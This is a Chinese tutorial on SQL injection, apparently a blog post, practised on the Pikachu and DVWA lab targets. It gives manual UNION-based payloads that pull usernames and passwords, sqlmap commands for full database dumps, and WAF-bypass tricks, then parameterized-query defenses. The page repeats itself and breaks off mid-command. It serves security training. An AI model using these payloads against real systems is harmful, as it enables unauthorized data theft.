1. 项目概述为什么SQL注入是安全测试的“必修课”在网络安全领域尤其是CTFCapture The Flag竞赛和渗透测试实战中SQL注入SQL Injection是一个绕不开的经典课题。它不仅是Web安全十大漏洞的“常青树”更是理解应用程序与数据库交互逻辑、检验开发者安全意识的绝佳窗口。CTFHub作为一个知名的网络安全技能学习与演练平台其SQL注入靶场设计得非常系统从基础的注入类型判断到复杂的绕过技巧几乎覆盖了实战中可能遇到的大部分场景。很多新手朋友一听到“注入”就觉得头大感觉要记很多复杂的Payload攻击载荷或者觉得只有用上sqlmap这样的“神器”才算入门。其实不然手工注入是理解漏洞本质的基石它能让你清晰地看到数据是如何“溜”出数据库的而自动化工具则是效率的倍增器将你从重复的猜测和尝试中解放出来。这个项目就是带你走完从“知其然”到“知其所以然”再到“善假于物”的完整路径。我们将以CTFHub技能树中的SQL注入关卡为蓝本结合经典的Pikachu、DVWA靶场手把手带你从手工探测开始一步步拆解注入过程最后用sqlmap实现自动化利用。无论你是准备打CTF比赛的学生还是刚入行的安全工程师或是想提升代码安全性的开发者这篇内容都能给你带来实实在在的收获。2. 核心思路拆解手工与自动化的辩证关系在开始实操之前我们必须先理清一个核心思路手工注入和自动化工具并非对立而是相辅相成的两个阶段。手工注入是“显微镜”让你看清漏洞的每一个细节自动化工具是“收割机”帮你快速、批量地完成验证和利用。2.1 为什么必须从手工开始直接上sqlmap扫一下固然快但如果你完全不懂背后的原理那么无法判断误报工具报了一个注入点是真的存在漏洞还是因为WAFWeb应用防火墙的干扰产生了误报你不懂手工判断的逻辑就无法确认。无法应对复杂场景当注入点隐藏在JSON数据、HTTP头部或者存在复杂的过滤、编码时sqlmap可能无法直接识别。你需要手工调整Payload的结构甚至编写tamper脚本篡改脚本来绕过防护。难以深入理解漏洞成因只有亲手通过and 11、and 12这样的逻辑去测试看到页面回显的差异你才能真正理解“用户输入被拼接进SQL语句执行”这一漏洞的本质。这是后续进行安全代码审计和漏洞修复的基础。手工注入的核心目标是完成对漏洞点的“侦查”与“确认”。这个过程可以概括为寻找输入点 - 判断注入类型 - 探测数据库结构 - 提取目标数据。2.2 自动化工具的价值在哪里当你通过手工方式确认了漏洞的存在并摸清了基本的注入类型和过滤规则后自动化工具的价值就凸显出来了提升效率手工一步步猜解数据库名、表名、字段名是极其耗时的工作。sqlmap内置了强大的字典和智能算法可以自动完成这些信息获取。全面探测sqlmap能自动识别数据库类型MySQL、Oracle、SQL Server等、版本、当前用户权限等信息这些信息对于评估漏洞危害至关重要。高级利用除了获取数据sqlmap还支持文件读写、执行操作系统命令在权限允许的情况下、导出整个数据库等高级操作这些如果手工完成将异常复杂。因此一个理想的流程是用手工的精确定位为自动化工具铺路用自动化工具的强大能力扩展手工测试的深度和广度。接下来我们就按照这个思路进入实战环节。3. 环境准备与靶场搭建工欲善其事必先利其器。我们需要一个安全、合法的环境来进行练习。绝对不要在未经授权的真实网站上进行测试那是违法行为。3.1 靶场选择与部署我们选择两个经典的集成漏洞环境Pikachu和DVWA。Pikachu的SQL注入模块分类清晰非常适合新手按部就班地学习DVWA则提供了不同安全等级Low, Medium, High可以让我们体验不同防御级别下的注入手法。部署方法以Pikachu为例安装PHP集成环境推荐使用XAMPP或PHPStudy。这类工具一键安装了Apache、MySQL、PHP省去大量配置时间。下载靶场源码从GitHub等官方渠道下载Pikachu的源码压缩包。部署源码将解压后的pikachu文件夹放入你PHP环境的网站根目录例如XAMPP是htdocs目录PHPStudy是WWW目录。初始化数据库在浏览器中访问http://localhost/pikachu页面通常会有一个链接或提示引导你点击初始化数据库。这一步会自动创建必要的数据库和表。启动服务确保你的Apache和MySQL服务已经通过XAMPP或PHPStudy的控制面板启动。注意不同版本的PHP和MySQL可能会遇到兼容性问题。如果遇到页面报错最常见的原因是PHP版本过高。可以尝试将PHP版本切换至7.2或5.6等旧版本。这是搭建所有老旧靶场时的一个通用技巧。3.2 必要工具准备浏览器任何现代浏览器均可。建议安装一些插件辅助测试如Hack-Tools、EditThisCookie等但不是必须。代理抓包工具Burp Suite Community Edition社区版。这是安全测试的“瑞士军刀”用于拦截、查看和修改浏览器发送的HTTP/HTTPS请求。手工测试时我们经常需要在Burp的Repeater模块中反复修改和发送Payload。自动化注入工具sqlmap。这是我们的主角。确保你的Python环境建议Python 3已安装好然后通过git clone https://github.com/sqlmapproject/sqlmap.git克隆官方仓库或直接下载zip包解压即可使用。环境就绪后我们打开Pikachu找到“SQL注入”板块里面罗列了“数字型注入”、“字符型注入”、“搜索型注入”等多个子关卡。我们就从最基础的开始。4. 手工注入实战全流程解析我们以Pikachu的“数字型注入GET”关卡为例进行全程拆解。假设目标URL是http://localhost/pikachu/vul/sqli/sqli_id.php?id1。4.1 第一步寻找与确认注入点注入点就是应用程序将用户输入拼接到SQL语句中的地方。最常见的就是URL参数如?id1、表单输入框、Cookie值等。探测逻辑我们的目标是让应用程序执行我们预期的SQL逻辑从而从页面的回显差异上判断漏洞是否存在。基础逻辑测试访问?id1 and 11。如果页面正常显示id为1的用户信息说明and 11这个永真条件被数据库执行了。访问?id1 and 12。这是一个永假条件。如果页面显示异常如空白、报错、或显示内容与id1时不同则强烈暗示存在注入漏洞。因为12为假导致整个SQL查询条件不成立可能返回空结果集。验证数字型注入访问?id2-1。如果页面显示的内容与?id1时完全一样那这就是数字型注入的铁证因为数据库执行了2-1这个运算结果就是1。这证明id参数的值是被直接放入SQL语句中参与运算的没有用引号包裹。实操心得and 11和and 12是经典的“黄金组合”。但有些网站会对and、or这样的关键词进行过滤。此时可以尝试用代替and用||代替or注意URL编码或者用注释符--或#提前结束原语句。例如?id1 and 11和?id1 and 12。4.2 第二步判断注入点类型与闭合方式确认存在注入后需要判断原SQL语句是如何“包裹”用户输入的。这决定了我们Payload的写法。数字型参数直接被用作数字无需引号。如SELECT * FROM users WHERE id $id。Payload直接拼接即可1 and 11。字符型参数被单引号或双引号包裹。如SELECT * FROM users WHERE name $name。我们需要“闭合”前面的引号并注释掉后面的引号。例如1 and 11或更常见的1 and 11 ----是注释符在URL中代表空格。在Pikachu数字型关卡中我们已经用2-1证明了是数字型。但对于字符型关卡如“字符型注入GET”你需要尝试?nameadmin and 11和?nameadmin and 12观察回显差异。4.3 第三步探测数据库信息ORDER BY与UNION SELECT知道怎么“注入”之后我们开始获取信息。首先需要知道当前查询结果返回了多少列因为后续的UNION查询必须列数相同。使用ORDER BY猜解列数ORDER BY用于对结果集按某一列排序。如果ORDER BY 5表示按第5列排序但如果表没有第5列数据库就会报错。我们可以利用这个特性来猜。尝试?id1 order by 1-- 页面正常尝试?id1 order by 2-- 页面正常尝试?id1 order by 3-- 页面正常尝试?id1 order by 4-- 页面报错或显示异常 这说明当前查询结果只有3列。使用UNION SELECT联合查询获取数据UNION操作符用于合并两个SELECT语句的结果集。前提是列数必须相同。我们已经知道是3列。首先要让前一个SELECT查询结果为空这样页面才会显示我们UNION后面的查询结果。通常用?id-1或者?id1 and 12。构造Payload?id-1 union select 1,2,3访问这个链接观察页面。原本显示数据的地方可能会变成数字2或3。这说明页面的这个位置会显示我们查询结果的第2列或第3列。我们称之为“回显位”。获取数据库信息 现在我们把回显位比如是第2列替换成我们想查询的数据库函数。查询数据库版本?id-1 union select 1,version(),3查询当前数据库名?id-1 union select 1,database(),3查询当前用户?id-1 union select 1,user(),3页面在回显位的地方就会显示出MySQL的版本、当前使用的数据库名比如pikachu和当前连接的用户。4.4 第四步获取表名、列名与数据知道了数据库名下一步就是摸清库里有啥表表里有啥字段。获取表名 在MySQL中表信息存储在information_schema.tables这个系统表中。?id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()group_concat()函数将多行结果合并成一个字符串用逗号分隔方便查看。table_schemadatabase()条件限定了只查询当前数据库下的表。 执行后你可能会得到类似httpinfo,member,message,users,xssblind...的结果。我们显然对users表更感兴趣。获取列名 类似地列信息存储在information_schema.columns中。?id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schemadatabase() and table_nameusers这里需要注意users是一个字符串在字符型注入中要处理好引号闭合。在数字型注入中如果原语句没有引号我们直接写users可能会出错。有时需要用到十六进制绕过比如把users转换成0x7573657273users的十六进制。更简单的方法是如果页面有字符型注入点就在那里测试。执行后可能得到id,username,password等列名。最终提取数据 万事俱备直接查询目标表。?id-1 union select 1,username,password from users或者为了看得更清楚?id-1 union select 1,concat(username, :, password),3 from users这样页面的回显位上就会列出所有用户的用户名和密码可能是MD5哈希值。至此一次完整的手工SQL注入攻击链就完成了。你从一个小小的id参数一步步拿到了整个用户表的数据。这个过程虽然繁琐但每一步都充满了与数据库“对话”的乐趣能让你深刻理解漏洞的威力。5. 自动化利器sqlmap核心用法解析手工走通了流程我们再来看看如何用sqlmap这把“自动化狙击枪”来高效完成上述所有步骤甚至更多。5.1 基础扫描与检测假设目标URL是http://localhost/pikachu/vul/sqli/sqli_id.php?id1。最基本的检测python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1执行这条命令sqlmap会自动识别参数id可能存在注入。使用预定义的Payload库进行测试尝试判断注入类型布尔盲注、时间盲注、报错注入、联合查询注入等。在终端里输出检测结果告诉你是否存在注入、是什么类型的注入、后端数据库可能是什么。获取当前数据库信息python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 --current-db --current-user--current-db获取当前数据库名。--current-user获取当前数据库用户。 这条命令直接给出了我们手工用database()和user()函数查询的结果。5.2 枚举数据库结构列出所有数据库python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 --dbs这会列出MySQL服务器上所有你有权限查看的数据库类似于执行SHOW DATABASES;。列出指定数据库的所有表python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 -D pikachu --tables-D指定数据库名。执行后会列出pikachu数据库中的所有表。列出指定表的所有列python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 -D pikachu -T users --columns-T指定表名。执行后会列出users表的所有列名及其数据类型。5.3 提取数据与高级操作导出表数据python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 -D pikachu -T users -C username,password --dump-C指定要导出的列多列用逗号分隔。--dump是导出转储数据的意思。执行后sqlmap不仅会获取数据还会尝试对常见的哈希如MD5进行破解并将结果保存到本地文件中。全自动化python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 --batch --dump-all--batch对所有交互提示自动选择默认选项实现全自动化。--dump-all导出当前数据库所有表的所有数据。慎用数据量可能非常大。 这条命令可以说是“终极懒人包”从检测到拖库一条龙服务。5.4 应对特殊场景POST请求注入 如果注入点在登录框等POST请求中你需要提供数据。python sqlmap.py -u http://target.com/login.php --datausernameadminpasswordpass或者更常用的方法是先用Burp Suite抓取完整的POST请求保存到一个文件比如post.txt然后python sqlmap.py -r post.txt-r参数让sqlmap从文件中读取HTTP请求非常方便。使用Cookie保持会话 很多页面需要登录后才能访问。你需要将浏览器登录后的Cookie复制给sqlmap。python sqlmap.py -u http://target.com/vul.php?id1 --cookiePHPSESSID你的sessionid值使用代理观察流量 为了看清sqlmap在发送什么Payload或者为了绕过某些IP限制可以设置代理。python sqlmap.py -u http://target.com/vul.php?id1 --proxyhttp://127.0.0.1:8080这样所有流量都会经过你Burp Suite的代理默认8080端口方便分析和调试。重要注意事项sqlmap功能强大但请务必只在你自己拥有完全控制权的靶场或获得明确书面授权的测试中使用。未经授权的测试是违法的。在CTF比赛中也要遵守比赛规则。6. 从靶场到实战常见防御与绕过技巧真实的网站不会像靶场这样“门户大开”。它们会有各种防御措施。了解如何绕过它们才是真正考验功力的时候。6.1 常见防御手段输入过滤与转义这是最基础的手段。例如使用mysql_real_escape_string()函数PHP对单引号等特殊字符进行转义或者使用参数化查询预编译语句。Web应用防火墙WAF部署在应用前面的安全设备或软件可以识别并拦截常见的攻击Payload如union select、information_schema等。错误信息屏蔽将数据库的详细错误信息隐藏只返回通用的错误页面增加“盲注”的难度。6.2 手工绕过技巧示例大小写/关键字拆分绕过过滤了union尝试UnIoN、uNiOn。过滤了select尝试SELselectECT假设过滤函数只替换一次变成SELECT依然可以执行或者用%00空字节分隔。等价替换and可以用替换。or可以用||替换。可以用like、rlike、regexp替换或者用不等于的逻辑取反。编码绕过URL编码union select-%75%6e%69%6f%6e%20%73%65%6c%65%63%74十六进制select-0x73656c656374Unicode编码有时可以尝试。注释符妙用/**/可以充当空格。union/**/select。内联注释/*!...*/在MySQL中/*!50001union*/ select其中的50001表示在MySQL版本大于等于5.00.01时才执行其中的语句可以用来绕过一些简单的WAF规则匹配。盲注 当页面没有明确的数据回显只有“存在”与“不存在”两种状态布尔盲注或者通过响应时间长短来判断时间盲注时就需要用到盲注。手工盲注极其繁琐主要依靠substring()、ascii()、if()、sleep()等函数配合脚本进行自动化猜解。这也是sqlmap等工具大显身手的地方它能自动识别并利用盲注漏洞。6.3 sqlmap的绕过策略sqlmap内置了tamper脚本专门用于对Payload进行各种混淆和编码以绕过WAF。使用tamper脚本python sqlmap.py -u http://target.com/vul.php?id1 --tamperspace2commentspace2comment脚本会把空格替换成/**/。between用between替换。charencode对Payload进行URL编码。randomcase随机大小写。你可以同时使用多个脚本--tamperspace2comment,charencode。高级选项python sqlmap.py -u http://target.com/vul.php?id1 --level3 --risk3--level测试等级1-5等级越高发送的测试Payload越多、越复杂。--risk风险等级1-3风险越高测试可能引发更多请求或对数据造成更新如使用OR条件的Payload。在实际面对一个可能存在防护的目标时一个典型的思路是先用手工方式简单探测判断是否存在过滤以及过滤了哪些关键词然后根据过滤情况选择合适的sqlmap tamper脚本组合进行自动化测试如果还不行可能需要自己编写或修改tamper脚本。7. 实战问题排查与深度思考即使按照教程操作你也可能会遇到各种问题。这里记录一些我踩过的坑和解决方法。7.1 常见问题速查表问题现象可能原因解决方案sqlmap检测不到注入点1. 目标真的没有SQL注入漏洞。2. 存在WAF/过滤默认Payload被拦截。3. 注入点类型特殊如Cookie、User-Agent头。4. 需要登录会话失效。1. 用手工方式仔细验证。2. 使用--tamper脚本或降低检测强度--level 1。3. 用-r加载抓包文件或指定参数-p “Cookie”。4. 提供有效的--cookie。手工注入时union select不显示回显1. 原查询结果不为空union的结果被覆盖。2. 页面有多个回显位需要尝试不同列。3. 不是联合查询注入可能是报错注入或盲注。1. 确保前一个SELECT结果为空id-1。2. 尝试union select null,null,null看哪个位置被输出。3. 尝试报错注入Payload如and updatexml(1,concat(0x7e,database()),1)。靶场页面报错或无法连接数据库1. 数据库服务未启动。2. 靶场源码的数据库配置文件有误。3. PHP版本不兼容。1. 检查XAMPP/PHPStudy中的MySQL服务状态。2. 检查pikachu目录下的inc/config.inc.php等配置文件确保数据库连接信息正确。3. 切换PHP版本到5.6或7.2。使用--dump时sqlmap卡住1. 数据量太大。2. 网络延迟或目标响应慢。3. 在枚举阶段遇到了问题。1. 使用--start和--stop参数分块获取如--dump --start 1 --stop 10。2. 增加超时时间--timeout30。3. 先单独执行--columns看看是否正常。7.2 从攻击者到防御者的思维转变当我们熟练掌握了注入技巧后更重要的是学会如何防御。这才是安全工作的核心价值。根本解决方案参数化查询预编译语句这是防止SQL注入最有效、最根本的方法。它的原理是将SQL语句的结构模板与数据参数分开发送给数据库。数据库先编译语句结构再将参数当作纯数据处理从根本上杜绝了参数被解释为代码的可能性。PHP (PDO):$stmt $pdo-prepare(SELECT * FROM users WHERE id :id AND username :name); $stmt-execute([id $id, name $name]); $results $stmt-fetchAll();Java (PreparedStatement):String sql SELECT * FROM users WHERE id ? AND username ?; PreparedStatement pstmt connection.prepareStatement(sql); pstmt.setInt(1, userId); pstmt.setString(2, userName); ResultSet rs pstmt.executeQuery();请在你的代码中永远使用这种方式来拼接SQL语句。纵深防御策略输入验证在业务逻辑层对输入数据的类型、长度、格式进行严格检查。例如id参数必须是整数就可以用intval()函数强制转换。最小权限原则为Web应用连接数据库的账户分配最小的必要权限。通常只赋予SELECT、INSERT、UPDATE、DELETE等操作权限绝不赋予DROP、FILE、EXECUTE等高风险权限。错误处理自定义错误页面避免将数据库的原始错误信息包含路径、SQL语句片段等直接展示给用户。WAF在应用层前部署WAF作为一道额外的防线可以拦截大量已知的攻击模式。手工注入训练了你的“攻击视角”让你能像黑客一样思考而理解防御则培养了你的“建设者视角”让你能构建更坚固的系统。两者结合才能让你在网络安全这条路上走得更远、更稳。在CTFHub的技能树里爬升或者在Pikachu、DVWA里通关都只是起点。真正的战场在于你是否能将这份对漏洞的深刻理解融入到日常开发和安全评估的每一个细节中去。
SQL注入攻防实战:从手工注入到sqlmap自动化利用
发布时间:2026/6/22 8:10:53
1. 项目概述为什么SQL注入是安全测试的“必修课”在网络安全领域尤其是CTFCapture The Flag竞赛和渗透测试实战中SQL注入SQL Injection是一个绕不开的经典课题。它不仅是Web安全十大漏洞的“常青树”更是理解应用程序与数据库交互逻辑、检验开发者安全意识的绝佳窗口。CTFHub作为一个知名的网络安全技能学习与演练平台其SQL注入靶场设计得非常系统从基础的注入类型判断到复杂的绕过技巧几乎覆盖了实战中可能遇到的大部分场景。很多新手朋友一听到“注入”就觉得头大感觉要记很多复杂的Payload攻击载荷或者觉得只有用上sqlmap这样的“神器”才算入门。其实不然手工注入是理解漏洞本质的基石它能让你清晰地看到数据是如何“溜”出数据库的而自动化工具则是效率的倍增器将你从重复的猜测和尝试中解放出来。这个项目就是带你走完从“知其然”到“知其所以然”再到“善假于物”的完整路径。我们将以CTFHub技能树中的SQL注入关卡为蓝本结合经典的Pikachu、DVWA靶场手把手带你从手工探测开始一步步拆解注入过程最后用sqlmap实现自动化利用。无论你是准备打CTF比赛的学生还是刚入行的安全工程师或是想提升代码安全性的开发者这篇内容都能给你带来实实在在的收获。2. 核心思路拆解手工与自动化的辩证关系在开始实操之前我们必须先理清一个核心思路手工注入和自动化工具并非对立而是相辅相成的两个阶段。手工注入是“显微镜”让你看清漏洞的每一个细节自动化工具是“收割机”帮你快速、批量地完成验证和利用。2.1 为什么必须从手工开始直接上sqlmap扫一下固然快但如果你完全不懂背后的原理那么无法判断误报工具报了一个注入点是真的存在漏洞还是因为WAFWeb应用防火墙的干扰产生了误报你不懂手工判断的逻辑就无法确认。无法应对复杂场景当注入点隐藏在JSON数据、HTTP头部或者存在复杂的过滤、编码时sqlmap可能无法直接识别。你需要手工调整Payload的结构甚至编写tamper脚本篡改脚本来绕过防护。难以深入理解漏洞成因只有亲手通过and 11、and 12这样的逻辑去测试看到页面回显的差异你才能真正理解“用户输入被拼接进SQL语句执行”这一漏洞的本质。这是后续进行安全代码审计和漏洞修复的基础。手工注入的核心目标是完成对漏洞点的“侦查”与“确认”。这个过程可以概括为寻找输入点 - 判断注入类型 - 探测数据库结构 - 提取目标数据。2.2 自动化工具的价值在哪里当你通过手工方式确认了漏洞的存在并摸清了基本的注入类型和过滤规则后自动化工具的价值就凸显出来了提升效率手工一步步猜解数据库名、表名、字段名是极其耗时的工作。sqlmap内置了强大的字典和智能算法可以自动完成这些信息获取。全面探测sqlmap能自动识别数据库类型MySQL、Oracle、SQL Server等、版本、当前用户权限等信息这些信息对于评估漏洞危害至关重要。高级利用除了获取数据sqlmap还支持文件读写、执行操作系统命令在权限允许的情况下、导出整个数据库等高级操作这些如果手工完成将异常复杂。因此一个理想的流程是用手工的精确定位为自动化工具铺路用自动化工具的强大能力扩展手工测试的深度和广度。接下来我们就按照这个思路进入实战环节。3. 环境准备与靶场搭建工欲善其事必先利其器。我们需要一个安全、合法的环境来进行练习。绝对不要在未经授权的真实网站上进行测试那是违法行为。3.1 靶场选择与部署我们选择两个经典的集成漏洞环境Pikachu和DVWA。Pikachu的SQL注入模块分类清晰非常适合新手按部就班地学习DVWA则提供了不同安全等级Low, Medium, High可以让我们体验不同防御级别下的注入手法。部署方法以Pikachu为例安装PHP集成环境推荐使用XAMPP或PHPStudy。这类工具一键安装了Apache、MySQL、PHP省去大量配置时间。下载靶场源码从GitHub等官方渠道下载Pikachu的源码压缩包。部署源码将解压后的pikachu文件夹放入你PHP环境的网站根目录例如XAMPP是htdocs目录PHPStudy是WWW目录。初始化数据库在浏览器中访问http://localhost/pikachu页面通常会有一个链接或提示引导你点击初始化数据库。这一步会自动创建必要的数据库和表。启动服务确保你的Apache和MySQL服务已经通过XAMPP或PHPStudy的控制面板启动。注意不同版本的PHP和MySQL可能会遇到兼容性问题。如果遇到页面报错最常见的原因是PHP版本过高。可以尝试将PHP版本切换至7.2或5.6等旧版本。这是搭建所有老旧靶场时的一个通用技巧。3.2 必要工具准备浏览器任何现代浏览器均可。建议安装一些插件辅助测试如Hack-Tools、EditThisCookie等但不是必须。代理抓包工具Burp Suite Community Edition社区版。这是安全测试的“瑞士军刀”用于拦截、查看和修改浏览器发送的HTTP/HTTPS请求。手工测试时我们经常需要在Burp的Repeater模块中反复修改和发送Payload。自动化注入工具sqlmap。这是我们的主角。确保你的Python环境建议Python 3已安装好然后通过git clone https://github.com/sqlmapproject/sqlmap.git克隆官方仓库或直接下载zip包解压即可使用。环境就绪后我们打开Pikachu找到“SQL注入”板块里面罗列了“数字型注入”、“字符型注入”、“搜索型注入”等多个子关卡。我们就从最基础的开始。4. 手工注入实战全流程解析我们以Pikachu的“数字型注入GET”关卡为例进行全程拆解。假设目标URL是http://localhost/pikachu/vul/sqli/sqli_id.php?id1。4.1 第一步寻找与确认注入点注入点就是应用程序将用户输入拼接到SQL语句中的地方。最常见的就是URL参数如?id1、表单输入框、Cookie值等。探测逻辑我们的目标是让应用程序执行我们预期的SQL逻辑从而从页面的回显差异上判断漏洞是否存在。基础逻辑测试访问?id1 and 11。如果页面正常显示id为1的用户信息说明and 11这个永真条件被数据库执行了。访问?id1 and 12。这是一个永假条件。如果页面显示异常如空白、报错、或显示内容与id1时不同则强烈暗示存在注入漏洞。因为12为假导致整个SQL查询条件不成立可能返回空结果集。验证数字型注入访问?id2-1。如果页面显示的内容与?id1时完全一样那这就是数字型注入的铁证因为数据库执行了2-1这个运算结果就是1。这证明id参数的值是被直接放入SQL语句中参与运算的没有用引号包裹。实操心得and 11和and 12是经典的“黄金组合”。但有些网站会对and、or这样的关键词进行过滤。此时可以尝试用代替and用||代替or注意URL编码或者用注释符--或#提前结束原语句。例如?id1 and 11和?id1 and 12。4.2 第二步判断注入点类型与闭合方式确认存在注入后需要判断原SQL语句是如何“包裹”用户输入的。这决定了我们Payload的写法。数字型参数直接被用作数字无需引号。如SELECT * FROM users WHERE id $id。Payload直接拼接即可1 and 11。字符型参数被单引号或双引号包裹。如SELECT * FROM users WHERE name $name。我们需要“闭合”前面的引号并注释掉后面的引号。例如1 and 11或更常见的1 and 11 ----是注释符在URL中代表空格。在Pikachu数字型关卡中我们已经用2-1证明了是数字型。但对于字符型关卡如“字符型注入GET”你需要尝试?nameadmin and 11和?nameadmin and 12观察回显差异。4.3 第三步探测数据库信息ORDER BY与UNION SELECT知道怎么“注入”之后我们开始获取信息。首先需要知道当前查询结果返回了多少列因为后续的UNION查询必须列数相同。使用ORDER BY猜解列数ORDER BY用于对结果集按某一列排序。如果ORDER BY 5表示按第5列排序但如果表没有第5列数据库就会报错。我们可以利用这个特性来猜。尝试?id1 order by 1-- 页面正常尝试?id1 order by 2-- 页面正常尝试?id1 order by 3-- 页面正常尝试?id1 order by 4-- 页面报错或显示异常 这说明当前查询结果只有3列。使用UNION SELECT联合查询获取数据UNION操作符用于合并两个SELECT语句的结果集。前提是列数必须相同。我们已经知道是3列。首先要让前一个SELECT查询结果为空这样页面才会显示我们UNION后面的查询结果。通常用?id-1或者?id1 and 12。构造Payload?id-1 union select 1,2,3访问这个链接观察页面。原本显示数据的地方可能会变成数字2或3。这说明页面的这个位置会显示我们查询结果的第2列或第3列。我们称之为“回显位”。获取数据库信息 现在我们把回显位比如是第2列替换成我们想查询的数据库函数。查询数据库版本?id-1 union select 1,version(),3查询当前数据库名?id-1 union select 1,database(),3查询当前用户?id-1 union select 1,user(),3页面在回显位的地方就会显示出MySQL的版本、当前使用的数据库名比如pikachu和当前连接的用户。4.4 第四步获取表名、列名与数据知道了数据库名下一步就是摸清库里有啥表表里有啥字段。获取表名 在MySQL中表信息存储在information_schema.tables这个系统表中。?id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()group_concat()函数将多行结果合并成一个字符串用逗号分隔方便查看。table_schemadatabase()条件限定了只查询当前数据库下的表。 执行后你可能会得到类似httpinfo,member,message,users,xssblind...的结果。我们显然对users表更感兴趣。获取列名 类似地列信息存储在information_schema.columns中。?id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schemadatabase() and table_nameusers这里需要注意users是一个字符串在字符型注入中要处理好引号闭合。在数字型注入中如果原语句没有引号我们直接写users可能会出错。有时需要用到十六进制绕过比如把users转换成0x7573657273users的十六进制。更简单的方法是如果页面有字符型注入点就在那里测试。执行后可能得到id,username,password等列名。最终提取数据 万事俱备直接查询目标表。?id-1 union select 1,username,password from users或者为了看得更清楚?id-1 union select 1,concat(username, :, password),3 from users这样页面的回显位上就会列出所有用户的用户名和密码可能是MD5哈希值。至此一次完整的手工SQL注入攻击链就完成了。你从一个小小的id参数一步步拿到了整个用户表的数据。这个过程虽然繁琐但每一步都充满了与数据库“对话”的乐趣能让你深刻理解漏洞的威力。5. 自动化利器sqlmap核心用法解析手工走通了流程我们再来看看如何用sqlmap这把“自动化狙击枪”来高效完成上述所有步骤甚至更多。5.1 基础扫描与检测假设目标URL是http://localhost/pikachu/vul/sqli/sqli_id.php?id1。最基本的检测python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1执行这条命令sqlmap会自动识别参数id可能存在注入。使用预定义的Payload库进行测试尝试判断注入类型布尔盲注、时间盲注、报错注入、联合查询注入等。在终端里输出检测结果告诉你是否存在注入、是什么类型的注入、后端数据库可能是什么。获取当前数据库信息python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 --current-db --current-user--current-db获取当前数据库名。--current-user获取当前数据库用户。 这条命令直接给出了我们手工用database()和user()函数查询的结果。5.2 枚举数据库结构列出所有数据库python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 --dbs这会列出MySQL服务器上所有你有权限查看的数据库类似于执行SHOW DATABASES;。列出指定数据库的所有表python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 -D pikachu --tables-D指定数据库名。执行后会列出pikachu数据库中的所有表。列出指定表的所有列python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 -D pikachu -T users --columns-T指定表名。执行后会列出users表的所有列名及其数据类型。5.3 提取数据与高级操作导出表数据python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 -D pikachu -T users -C username,password --dump-C指定要导出的列多列用逗号分隔。--dump是导出转储数据的意思。执行后sqlmap不仅会获取数据还会尝试对常见的哈希如MD5进行破解并将结果保存到本地文件中。全自动化python sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_id.php?id1 --batch --dump-all--batch对所有交互提示自动选择默认选项实现全自动化。--dump-all导出当前数据库所有表的所有数据。慎用数据量可能非常大。 这条命令可以说是“终极懒人包”从检测到拖库一条龙服务。5.4 应对特殊场景POST请求注入 如果注入点在登录框等POST请求中你需要提供数据。python sqlmap.py -u http://target.com/login.php --datausernameadminpasswordpass或者更常用的方法是先用Burp Suite抓取完整的POST请求保存到一个文件比如post.txt然后python sqlmap.py -r post.txt-r参数让sqlmap从文件中读取HTTP请求非常方便。使用Cookie保持会话 很多页面需要登录后才能访问。你需要将浏览器登录后的Cookie复制给sqlmap。python sqlmap.py -u http://target.com/vul.php?id1 --cookiePHPSESSID你的sessionid值使用代理观察流量 为了看清sqlmap在发送什么Payload或者为了绕过某些IP限制可以设置代理。python sqlmap.py -u http://target.com/vul.php?id1 --proxyhttp://127.0.0.1:8080这样所有流量都会经过你Burp Suite的代理默认8080端口方便分析和调试。重要注意事项sqlmap功能强大但请务必只在你自己拥有完全控制权的靶场或获得明确书面授权的测试中使用。未经授权的测试是违法的。在CTF比赛中也要遵守比赛规则。6. 从靶场到实战常见防御与绕过技巧真实的网站不会像靶场这样“门户大开”。它们会有各种防御措施。了解如何绕过它们才是真正考验功力的时候。6.1 常见防御手段输入过滤与转义这是最基础的手段。例如使用mysql_real_escape_string()函数PHP对单引号等特殊字符进行转义或者使用参数化查询预编译语句。Web应用防火墙WAF部署在应用前面的安全设备或软件可以识别并拦截常见的攻击Payload如union select、information_schema等。错误信息屏蔽将数据库的详细错误信息隐藏只返回通用的错误页面增加“盲注”的难度。6.2 手工绕过技巧示例大小写/关键字拆分绕过过滤了union尝试UnIoN、uNiOn。过滤了select尝试SELselectECT假设过滤函数只替换一次变成SELECT依然可以执行或者用%00空字节分隔。等价替换and可以用替换。or可以用||替换。可以用like、rlike、regexp替换或者用不等于的逻辑取反。编码绕过URL编码union select-%75%6e%69%6f%6e%20%73%65%6c%65%63%74十六进制select-0x73656c656374Unicode编码有时可以尝试。注释符妙用/**/可以充当空格。union/**/select。内联注释/*!...*/在MySQL中/*!50001union*/ select其中的50001表示在MySQL版本大于等于5.00.01时才执行其中的语句可以用来绕过一些简单的WAF规则匹配。盲注 当页面没有明确的数据回显只有“存在”与“不存在”两种状态布尔盲注或者通过响应时间长短来判断时间盲注时就需要用到盲注。手工盲注极其繁琐主要依靠substring()、ascii()、if()、sleep()等函数配合脚本进行自动化猜解。这也是sqlmap等工具大显身手的地方它能自动识别并利用盲注漏洞。6.3 sqlmap的绕过策略sqlmap内置了tamper脚本专门用于对Payload进行各种混淆和编码以绕过WAF。使用tamper脚本python sqlmap.py -u http://target.com/vul.php?id1 